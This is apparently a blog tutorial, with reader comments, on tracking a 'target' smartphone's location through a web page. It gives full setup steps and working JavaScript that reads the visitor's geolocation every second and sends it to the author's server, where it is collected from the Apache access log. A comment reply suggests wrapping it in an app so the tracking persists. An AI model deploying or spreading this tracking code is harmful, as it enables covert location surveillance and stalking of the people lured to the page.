Track any smartphone using a simple web page

What you will need

  • A server somewhere – I recommend a Digital Ocean VPS
  • A domain name

Setting everything up

I’m assuming you’re already logged into your VPS using SSH so I’ll start from there.

The first thing you’re going to need to do is point your domains ‘A’ record towards the IP address of your VPS. Every control panel is different, I use Google Domains so mine looked a little something like this:

Next you will need to do is install Apache:

sudo apt-get install apache2

With Apache installed we need to place our code into into the index.html file inside of /var/www/html

echo "" > /var/www/html/index.html
nano /var/www/html/index.html

The code you need, the same one from the video is below:

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script type='text/javascript'>
function httpGet(theUrl)
{
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false ); // false for synchronous request
    xmlHttp.send( null );
    return xmlHttp.responseText;
}

function autoUpdate() {
  navigator.geolocation.getCurrentPosition(function(position) {
    coords = position.coords.latitude + "," + position.coords.longitude;
    url = "https://yoursitehere.com/logme/" + coords;
    httpGet(url);
    console.log('should be working');
    setTimeout(autoUpdate, 1000);
})
};
$(document).ready(function(){
   autoUpdate();
});

</script>

You will need to replace where you see ‘yoursitehere.com’ with the domain name you have pointed towards your VPS.

At this point we need to enable SSL on our host so that we can use the API for geolocation. We’re going to install a free Let’s Encrypt SSL Certificate.

To find the correct install method for your operating system use this link.

Once you have installed letsencrypt/certbot you need to run the following command:

letsencrypt --apache

You will then be presented with a wizard, complete that with the information you have, be sure to select ‘secure‘ when you’re presented with the option.

Try it out

At this stage you’re complete, easy right? So on our VPS we’re going to run the following so that we can get a the coordinates as they’re sent to us:

tail -f /var/log/apache2/access.log

Then, browse to the domain on your target device. Accept the notification and then you should see something resembling the following:

The highlighted part shows the coordinates sent to use from the target device. We can now simply enter these into Google Maps to see the target’s location.

3 thoughts on “Track any smartphone using a simple web page

  • March 11, 2017 at 4:37 am
    Permalink

    So you would be creating a Web page to get people to visit and then you can get them to opt in and so you can collect GPS data? The script would stop visiting as soon as they exit the app perhaps only getting one ping location. How could you make it persistent?

    Reply
  • March 11, 2017 at 4:39 am
    Permalink

    How could you make this persistent? Is there some type of cookie that can keep pingin location when not on webpage?

    Reply
    • April 12, 2017 at 4:02 pm
      Permalink

      You’d have to include it within an application, and have the application run persistently

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: